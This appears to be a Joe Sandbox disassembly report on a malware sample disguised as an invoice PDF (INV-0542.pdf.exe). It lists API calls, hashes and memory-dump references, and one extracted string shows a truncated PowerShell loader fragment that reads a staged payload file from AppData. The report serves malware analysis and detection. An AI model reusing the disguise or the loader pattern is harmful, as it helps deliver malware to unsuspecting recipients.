Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 160c38975f312424f4866d14917befa5dd24af40cdf73f4d33e28196d90f96f9
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 44D0123204020EBBDF115E90ED01FAB3B1DAB08350F014426FE06E40A0D775D534A754

Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
Opcode Fuzzy Hash: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D

Function 0040450C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D

Function 00405B67 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B76

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29

Function 004034D4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08

Function 004044E2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19

Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010

Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
Opcode Fuzzy Hash: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E

Non-executed Functions

Function 004049B1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A00
SetWindowTextW.USER32(00000000,?), ref: 00404A2A
SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
CoTaskMemFree.OLE32(00000000), ref: 00404AE6
lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36

Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98

Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INV-0542.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\INV-0542.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
Part of subcall function 004067EF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879

GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14

Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A

Strings

: Completed, xrefs: 00404B12, 00404B17, 00404B22
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00404B01
A, xrefs: 00404AD4
"$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk, xrefs: 004049CA

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk$: Completed$A$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
API String ID: 2624150263-4288981242
Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D

Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F45
GetDlgItem.USER32(?,00000408), ref: 00404F50
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
SendMessageW.USER32(?,00001109,00000002), ref: 00405006
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
DeleteObject.GDI32(00000000), ref: 00405027
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129

Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
GetWindowLongW.USER32(?,000000F0), ref: 0040516B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
ShowWindow.USER32(?,00000005), ref: 00405189
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
ImageList_Destroy.COMCTL32(00000000), ref: 00405357
GlobalFree.KERNEL32(00000000), ref: 00405367
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
SendMessageW.USER32(?,00001102,?,?), ref: 00405489
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
ShowWindow.USER32(?,00000000), ref: 00405511
GetDlgItem.USER32(?,000003FE), ref: 0040551C
ShowWindow.USER32(00000000), ref: 00405523

Strings

, xrefs: 004054FB
N, xrefs: 004051C2
M, xrefs: 004050E1

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18

Function 0040467F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
GetDlgItem.USER32(?,000003E8), ref: 00404731
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
GetSysColor.USER32(?), ref: 0040475F
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
lstrlenW.KERNEL32(?), ref: 00404780
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
GetDlgItem.USER32(?,0000040A), ref: 004047FB
SendMessageW.USER32(00000000), ref: 00404802
GetDlgItem.USER32(?,000003E8), ref: 0040482D
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
SetCursor.USER32(00000000), ref: 00404881
LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
SetCursor.USER32(00000000), ref: 0040489D
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE

Strings

: Completed, xrefs: 0040485C
N, xrefs: 0040481B

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4

Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB

Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8

GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
wsprintfA.USER32 ref: 00406206
